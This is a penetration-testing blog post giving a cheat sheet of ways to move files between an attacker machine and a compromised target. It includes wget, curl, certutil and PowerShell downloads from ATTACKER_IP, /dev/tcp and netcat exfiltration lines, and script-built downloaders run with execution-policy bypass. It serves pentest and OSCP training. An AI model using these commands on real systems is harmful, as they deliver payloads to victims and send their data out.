File Transfer Cheat Sheet for Penetration Testers | OSCP

December 14, 2019

Hello, here is one of the most useful take away for penetration testers and for people who are aiming to be one. Today I am sharing the file transfer methodologies that I use on daily basis to transfer files from the target machine to attacker machine and attacker machine to target machine.

THIS IS MERELY CREATED FOR EDUCATIONAL & ETHICAL PURPOSE ONLY, AUTHOR IS NOT RESPONSIBLE FOR ANY ILLEGAL ACTIVITIES DONE BY THE VISITORS



Here is the collection of File transfer methodologies that you can use to copy files ,exploits, information easily. These work in most of the scenarios – if not you need to use these in a creative way. Here I will be using my Kali Linux as a Attacker machine to keep things easier to understand.  
File Transfer Cheatsheet for penetration testing oscp


Download a File Using wget: This is the one i use 90% of the time, if wget is not available i will go for nc or curl. 
Start a Python HTTP Server on You attacker Machine:

#Python HTTP server should be started in the same location as that of the files to be transferred

python -m SimpleHTTPServer 8001
On Victim:

wget http://ATTACKET_IP:8001/


Download a file using Just Bash Script

function __curl() {
  read proto server path <<<$(echo ${1//// })
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
  (while read line; do
   [[ "$line" == $'\r' ]] && break
  done && cat) <&3
  exec 3>&-
}

Download a File Using Curl:

Start a Python HTTP Server on You attacker Machine:

#Python HTTP server should be started in the same location as that of the files to be transferred

python -m SimpleHTTPServer 8001
On Victim:

curl http://ATTACKET_IP:8001/ --output file.exe

Download a File Using nc.exe: 

You can use any port which is open the inbound and outbound traffic through that port is allowed. 
Receive a File

nc –lvp 8001 > file.txt

nc HOST_IP 8001 
Send A File

nc.exe –l -p 4444 < file.txt  

nc.exe -w 1 127.0.0.1 4444 > file.txt


Download And Execute a file using Powershell:

Start a Python HTTP Server on You attacker Machine:

python -m SimpleHTTPServer 8001
on Target:

powershell Invoke-WebRequest -Uri ATTACKER_IP:8001/nc.exe -OutFile C:\Users\Administrator\downloads\nc.exe


Downloading a file using Cert Util:

certutil.exe -urlcache -split -f "http://ATTACKER_IP/exploit.bat" exploit.bat

Downloading a file without any tool on Target:

on Kali:

nc -nvlp 9001 > backup.7z
on Target:

cat file.7z > /dev/tcp/ATTACKER_IP/9001

Downloading a file using SCP:
scp username@TARGET_IP file.7z .

Download a File using Power Shell:

on Kali:

python -m SimpleHTTPServer 8001


on Victim:

powershell -Command (new-object System.Net.WebClient).Downloadfile('http://TARGET_IP:8001/41015.exe', 'shell.exe')

File Transfer using VBScript: This acts like a wget/curl. This can be used when there is no nc,ncat,certutil on a windows box. 
Target Machine (Windows):

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
To Download a file:
cscript wget.vbs http://ATTACKER_IP/nc.exe nc.exe

OR

powershell -ExecutionPolicy Bypass -File wget.ps1 http://ATTACKER_IP/nc.exe nc.exe

File Transfer using TFTP:

On Your Kali Machine:

mkdir /share

atftpd --daemon --port 69 /share

cp /usr/share/windows-binaries/nc.exe /share/     //Copy nc.exe to share folder 


On Target Machine:

tftp -i ATTACKER_IP get nc.exe

Non-Interactive File Transfer using FTP:

On Kali:

apt-get update && apt-get install pure-ftpd

cp /usr/share/windows-binaries/nc.exe .


nano ftp      

#copy-paste the below script into "ftp" file

#Script:

#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd bhanu -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart

chmod 755 ftp
./ftp                     //need to setup a password
On Target Machine:   //Downloading nc.exe using ftp.

echo open 10.11.0.5 21> ftp.txt
echo USER bhanu>> ftp.txt
echo ftp>> ftp.txt
echo bin >> ftp.txt
echo GET nc.exe >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txt


Downloading Files on Target machine(Powershell Script):
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://ATTACKER_IP/nc.exe" >>wget.ps1
echo $file = "nc.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

Execution:

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Let me know, which method you use frequently and if i missed something, please comment below. So, that i can add it to the list - which might be useful in some situations



==================       HACKING DREAM      ===================

Main Principle of My Hacking Dream is to Promote Hacking Tricks and Tips to All the People in the World, So That Everyone will be Aware of Hacking and protect themselves from Getting Hacked. Hacking Don’t Need Agreements.

I Will Be Very Happy To Help You, So For Queries or Any Problem Comment Below or You Can Mail Me At Bhanu@HackingDream.net

,
By:
Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.

No comments:

Post a Comment